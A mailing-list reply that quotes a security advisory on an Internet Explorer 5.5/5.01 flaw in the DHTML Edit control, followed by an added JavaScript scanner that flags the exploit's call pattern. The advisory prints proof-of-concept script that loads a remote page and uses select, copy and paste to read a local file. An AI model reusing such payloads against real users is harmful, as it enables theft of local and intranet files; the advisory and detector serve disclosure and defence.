At 09:25 PM 7/14/00 +0700, you wrote:
>Hi list members,
>has anyone already used IE 5.5? If you were using IE 5.0 and want to download IE 5.5
>over the internet, does IE 5.0 have to be uninstalled first? If so, using what

So what is the point of upgrading, if both of them have holes anyway?
---
IE 5.5 local text file reading vulnerability (DHTMLED)
--------------------------------------------------------------------------------
SUMMARY
Internet Explorer 5.5 and 5.01 suffer from a security problem that enables
malicious web sites to create a special HTML page which reads the content
of any local and remotely accessible html or text file.
The real danger is reading parsed web pages from Intranet web servers that
are supposedly secured behind the firewall.
The bug is also exploitable from HTML based email messages.
DETAILS
Vulnerable Versions
Internet Explorer 5.5 (all platforms)
Internet Explorer 5.01 (all platforms)
The problem is in the DHTMLED (DHTML Edit Control is marked Safe for
Scripting for IE), which is used for basic HTML editing. It allows opening
a page with an IFRAME and has problems with DOM protection. It is possible
to select the content of the IFRAME (which may be a document residing
anywhere, including local disk), copying it to the clipboard and then
reading it from the clipboard.
Example code:
------dh2.html--------------------------------
<SCRIPT>
alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
function f1()
{
  dh.DOM.all.I1.focus();
  dh.DOM.all.I1.document.execCommand("selectall");
  dh.DOM.all.I1.document.execCommand("copy");
  r=document.all.S1.createTextRange();
  r.execCommand("paste");
  alert("Here is your file: "+S1.value);
}
function loadit()
{
  dh.loadURL("http://www.nat.bg/~joro/ifr2.html");
  //          ^^^^^^^^^^^^^^ You may need to edit this
  setTimeout("f1()",5000);
}
setTimeout("loadit();",1000);
</SCRIPT>
---------------------------------------------------
---------ifr2.html---------------------------------
---------------------------------------------------
Demonstration is available at:
http://www.nat.bg/~joro/dh2.html
Workaround:
As usual, disable Active Scripting or disable 'Run ActiveX controls and
plug-ins'.
ADDITIONAL INFORMATION
The information has been provided by Georgi Guninski.
========================================
------------------------------------------------------------------------
[EMAIL PROTECTED] - Mailing List MIKRODATA
Website : http:[EMAIL PROTECTED]
Archives : http://www.mail-archive.com/forum%40mikrodata.co.id/
This mailing list contributes to several columns run by the MIKRODATA team,
including columns that appear in other media.
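
The advisory quoted above describes content being selected and copied inside a loaded document and then pasted into another object. The following is an added example, not part of the original message or the advisory: a heuristic scan that a mail or proxy filter could run over HTML to flag that call sequence. The function name scanHtml, the verdict labels and the example.invalid URL are assumptions made for the illustration.

```javascript
// Added example (not from the advisory): heuristic scan of a page or HTML
// mail body for the clipboard relay used in dh2.html. Regex-based, so it
// only sees literal calls; it is not a JavaScript parser.
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
const EXEC_RE = /([\w$.\[\]]+)\s*\.\s*execCommand\s*\(\s*["']([a-z]+)["']/gi;
const LOADURL_RE = /([\w$]+)\s*\.\s*loadURL\s*\(\s*["']([^"']*)["']/gi;

function scanHtml(html) {
  const out = { scripts: 0, loadUrl: [], commands: [] };
  for (const m of html.matchAll(SCRIPT_RE)) {
    out.scripts++;
    for (const l of m[1].matchAll(LOADURL_RE))
      out.loadUrl.push({ object: l[1], url: l[2] });
    for (const e of m[1].matchAll(EXEC_RE))
      out.commands.push({ receiver: e[1], command: e[2].toLowerCase() });
  }
  const by = (...names) => out.commands.filter(c => names.includes(c.command));
  // Relay: content copied or cut from one document, pasted into another object.
  out.clipboardRelay = by("copy", "cut").some(c =>
    by("paste").some(p => p.receiver !== c.receiver));
  // Hypothetical verdict labels: relay plus a scripted loadURL is blocked.
  out.verdict = !out.clipboardRelay ? "pass"
    : out.loadUrl.length > 0 ? "block" : "review";
  return out;
}

// Constructed samples: SUSPECT mirrors the call sequence of dh2.html with a
// placeholder URL; BENIGN copies a selection and never pastes.
const SUSPECT = `<SCRIPT>
function f1() {
  dh.DOM.all.I1.document.execCommand("selectall");
  dh.DOM.all.I1.document.execCommand("copy");
  r = document.all.S1.createTextRange();
  r.execCommand("paste");
}
dh.loadURL("http://example.invalid/ifr2.html");
</SCRIPT>`;
const BENIGN = `<script>
function copySelection() { document.execCommand("copy"); }
</script>`;

console.log(scanHtml(SUSPECT).verdict, scanHtml(BENIGN).verdict);
```

The scan only complements the workaround in the advisory; with Active Scripting disabled the script never runs at all.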